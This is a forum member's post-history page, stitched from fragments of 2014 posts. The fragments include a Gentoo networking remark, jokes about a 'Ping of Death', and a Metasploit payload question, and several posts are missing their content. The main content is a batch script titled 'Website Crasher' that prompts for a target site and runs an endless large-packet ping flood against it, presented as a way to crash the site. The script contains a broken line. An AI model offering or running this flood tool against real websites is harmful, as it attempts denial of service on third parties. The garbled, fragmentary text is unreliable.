1
Operating System / Re: Tackling the Gentoo beast!
« on: November 02, 2014, 06:31:08 am »
^ ipconfig -a ? I think its ipconifg -c
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
LOOOLThinking the Same thing, Its a DOS Ping of Death.. only works on Wix mainly because they still
Nice joke , is it april ?
Hi,Insted of "use" Have you tried using "get"
i am receiving
my command is
but if i use shell_bind_tcp, for example, there's no error. its working.
do you know what could be the problem? i browsed the internet but couldnt find any useful info.
For those who are curious of what the code looks like before downloading:Thanks Mate! I was Gonna post the Code for pepole to veiw!Code: [Select]@echo off
Title DevnithDaAmazings Website Crasher
color 0e
echo Enter the website you would like to crash
set input=
set /p input= Enter your Website here:
if %input%==goto A if NOT B
echo Processing Your request
ping localhost>nul
echo To end Crashing press CTRL + C
ping localhost>nul
cls
echo ----------------------------------------------------------------------
echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
echo Crasher made by DevnithDaAmazing
echo ----------------------------------------------------------------------
ping %input% -t -l 1000